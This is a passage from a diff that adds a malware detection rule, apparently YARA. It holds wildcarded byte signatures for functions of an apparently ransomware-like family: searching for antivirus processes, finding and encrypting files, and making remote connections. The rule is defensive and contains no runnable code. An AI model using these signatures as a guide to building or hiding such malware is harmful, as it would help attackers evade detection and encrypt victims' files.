+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ??
+            ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? FF D6 FF 35 ?? ?? ?? ?? 03 C0 A3 ?? ?? ?? ?? FF D6 03 C0 8B D0
+            E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 57 57 68 ?? ?? ?? ?? 57 57 FF 15 ?? ?? ?? ??
+            8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 BB ?? ?? ?? ?? 53
+            FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ??
+            FF D6 E8 ?? ?? ?? ?? 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? E8
+        }
+		$url_parameters_setup_v4 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 50 FF
+            15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 6A ?? FF 15 ??
+            ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF
+            35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ??
+            ?? FF D6 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 8B D0 E8 ?? ?? ?? ?? 6A ?? FF 15
+            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6 68 ?? ?? ??
+            ?? FF D6 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF D6
+            68 ?? ?? ?? ?? FF D6 E8 ?? ?? ?? ?? E8
+        }
+		$search_antivirus_processes_v4 = {
+            55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? FF D6 8B 5D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 03 C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? FF D6 8B F8 89 7D ?? 85 FF 74 ?? 6A ?? 6A ?? C7 07 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E
+            33 C0 5B 8B E5 5D C2 ?? ?? 33 C9 33 F6 57 50 89 4D ?? 89 4D ?? 89 4D ?? 89 75 ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 49 ?? 85 F6 0F 85 ?? ?? ?? ?? 83 C7 ?? EB
+            ?? 8D 49 ?? 57 FF 74 B5 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 46 83 FE ?? 72 ?? 8B 75 ??
+            EB ?? 83 7D ?? ?? 57 FF 33 C7 45 ?? ?? ?? ?? ?? 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 33 FF 15 ?? ?? ?? ?? EB ?? 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 33 FF D6
+            FF 45 ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 75 ?? 8D 0C 41 B8 ?? ?? ?? ?? 81 F9 ?? ??
+            ?? ?? 89 4D ?? 0F 47 F0 89 75 ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 03 66 83 38 ?? 74
+            ?? 50 FF 15 ?? ?? ?? ?? 8B 0B 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 8B 35 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 8B 7D ?? 85 FF 75
+            ?? 68 ?? ?? ?? ?? 57 FF 33 FF D6 8B C7 5F 5E 5B 8B E5 5D C2
+        }
+		$find_files_v4 = {
+            C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 0F 84 ?? ?? ??
+            ?? 8D 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 89 44 24
+            ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04
+            46 89 44 24 ?? FF D7 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24
+            ?? 66 89 11 83 F8 ?? 75 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B
+            E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF D7 F6
+            44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56
+            FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E
+            33 C0 5B 8B E5 5D C3
+        }
+		$crypt_files_v4 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 33 DB 89 4D ?? 68 ?? ?? ??
+            ?? 53 8B F2 89 5D ?? FF 15 ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B
+            8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
+            8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 88 5D ?? 48 75 ?? 8B 45 ?? 89 85 ??
+            ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B
+            45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 68
+            ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 5D ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 6A ?? C7 05 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? FF D3 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            89 45 ?? FF D3 33 C9 8B D8 89 4D ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 3D
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 42 CA 01 87 ?? ?? ?? ?? 8B 55 ?? 83 97 ?? ?? ?? ?? ??
+            8B 7D ?? 89 4D ?? 8D 8D ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B C7 F7 D8 99 6A
+            ?? 6A ?? 52 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50
+            57 53 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57
+            53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 8B 7D ?? 85 C9 0F 84 ?? ?? ?? ?? 6A ??
+            8D 45 ?? 50 68 ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? 89
+            45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
+            ?? 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3
+        }
+		$crypt_files_v3 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45
+            ?? ?? ?? ?? ?? 50 6A ?? 8B D9 8B CA 6A ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 8B F8 C7 45 ?? ?? ?? ?? ?? 53 57 89 7D ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ??
+            ?? ?? 66 0F 6F 05 ?? ?? ?? ?? BA ?? ?? ?? ?? F3 0F 7F 85 ?? ?? ?? ?? 51 66 0F 6F 05
+            ?? ?? ?? ?? 8D 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 66 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
+            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D6 F3 0F 6F 85 ?? ?? ?? ?? 8B F8 6A ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? F3 0F 7F 07 6A ?? F3 0F 6F 45 ?? 89 7D ?? F3 0F 7F 47 ?? FF D6
+            F3 0F 6F 45 ?? 68 ?? ?? ?? ?? 89 45 ?? F3 0F 7F 00 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50
+            57 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 68 ??
+            ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ??
+            ?? 6A ?? FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 0F 57 C0 66 0F 13 45 ??
+            8B 75 ?? 8B 5D ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 6A ?? 8B D8
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C7 03 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF D6 8B
+            3D ?? ?? ?? ?? 33 F6 33 C9 89 45 ?? 89 4D ?? EB ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 68 ??
+            ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84
+            ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            0F 42 F1 01 03 83 53 ?? ?? 8B 45 ?? 89 45 ?? 89 45 ?? A8 ?? 74 ?? 8B FF 40 A8 ?? 75
+            ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 45 ?? FF 75
+            ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 8D 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 45 ??
+            F7 D9 6A ?? 83 D0 ?? 6A ?? F7 D8 50 51 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15
+            ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? BE ?? ?? ?? ?? 89 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 85 F6 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 4D ?? 8B 75 ?? 85 C9 75 ?? 51 8D 45 ?? 50
+            68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75
+            ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ??
+            ?? ?? ?? 8B 03 8B 73 ?? 68 ?? ?? ?? ?? 6A ?? 53 89 45 ?? FF D7 68 ?? ?? ?? ?? 6A ??
+            FF 75 ?? FF D7 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D7 8B 5D ?? 68 ?? ?? ?? ?? 6A ?? FF
+            75 ?? FF D7 5F 8B D6 8B C3 5E 5B 8B E5 5D C3
+        }
+		$search_antivirus_processes_v5 = {
+            8B 7D ?? 6A ?? 53 6A ?? 33 DB 89 07 53 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF
+            D6 8B F0 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 6A ?? C7 06 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 89 45 ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 53 56 FF 15 ?? ?? ?? ?? EB ?? 56 33 C9 89
+            5D ?? 50 89 5D ?? 89 4D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F
+            85 ?? ?? ?? ?? 33 C0 8D 4E ?? 89 45 ?? 51 FF 74 85 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            8B 45 ?? 8D 4E ?? 40 89 45 ?? 83 F8 ?? 72 ?? EB ?? 33 C0 39 45 ?? 8D 58 ?? 8D 46 ??
+            50 FF 37 75 ?? FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 37 FF 15
+            ?? ?? ?? ?? FF 45 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 8D 0C 41 8B 45 ??
+            81 F9 ?? ?? ?? ?? 89 4D ?? 59 0F 47 C1 89 45 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 85 DB 74 ?? 8B 07 33 C9 66 39 08
+            74 ?? 50 FF 15 ?? ?? ?? ?? 8B 0F 33 D2 66 89 54 41 ?? 8B 45 ?? 8B 4D ?? 89 08 68 ??
+            ?? ?? ?? 33 C0 50 56 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 85 DB 75 ??
+            68 ?? ?? ?? ?? 33 C0 50 FF 37 FF D6 8B C3 5F 5E 5B 8B E5 5D C2
+        }
+		$find_files_v5 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
+            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
+            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
+            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 57 57 8D 44 24 ?? 50
+            6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF
+            15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ??
+            85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ??
+            ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE
+            E8 ?? ?? ?? ?? 59 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ??
+            ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
+        }
+		$crypt_files_v5 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B D9 89 55 ?? 33 FF 89 5D ?? 21 7D ?? B9 ?? ??
+            ?? ?? 89 7D ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 75 ?? 33 C0 E9 ?? ?? ?? ?? FF 75
+            ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? EB ??
+            33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B D8 83 FB
+            ?? 75 ?? 33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15
+            ?? ?? ?? ?? 6A ?? 58 C6 45 ?? ?? 48 75 ?? 51 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 8E ?? ?? ?? ?? 21 7D ?? 21 7D ?? 41 89 45 ??
+            8B 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 83 C1 ?? 89 45 ?? E8 ?? ?? ?? ??
+            89 45 ?? 33 FF 6A ?? 8D 45 ?? 50 FF B6 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 86 ?? ?? ?? ?? 8B 55 ?? 6A
+            ?? 59 0F 42 F9 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 0F 45 7D ?? 01 86 ?? ?? ?? ?? 89 7D ??
+            83 96 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33
+            C9 F7 D8 41 99 51 6A ?? 52 50 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75
+            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ??
+            8D 45 ?? 50 57 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 75 ?? 8B 7D ?? 33 C0 40 01 86
+            ?? ?? ?? ?? 83 96 ?? ?? ?? ?? ?? EB ?? 33 C0 8D 78 ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7D
+            ?? ?? 74 ?? 6A ?? 6A ?? 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF 15 ?? ?? ??
+            ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ??
+            E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ??
+            85 FF 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ?? 83 65 ?? ?? 83 65 ?? ?? 8B 35 ??
+            ?? ?? ?? FF D6 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F8 33 C0 40 83 67 ??
+            ?? 88 07 FF D6 FF 75 ?? 03 C0 89 47 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 FF 75 ?? 8D 47
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 75 ?? FF D6 8D 04 45 ?? ?? ?? ?? 50 57 8D 45
+            ?? 50 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B CF E8 ?? ?? ?? ?? 8B 7D ?? 8B 45 ?? FF
+            70 ?? FF 70 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B
+            8B E5 5D C3
+        }
+		$remote_connection_v5 = {
+            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
+            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
+            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
+            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
+            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF
+            15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B
+            E5 5D C2
+        }
+		$remote_connection_v5_0_1 = {
+            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
+            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
+            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
+            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
+            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 33 C9 41 85 C0 8B 45 ?? 0F 45
+            F9 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
+        }
+		$url_parameters_setup_v5 = {
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
